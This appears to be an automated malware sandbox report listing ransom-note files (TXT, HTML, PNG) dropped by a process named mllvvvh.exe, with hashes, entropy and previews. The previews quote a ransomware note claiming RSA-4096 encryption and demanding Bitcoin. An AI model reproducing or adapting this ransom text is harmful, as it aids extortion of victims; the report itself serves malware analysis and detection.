                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
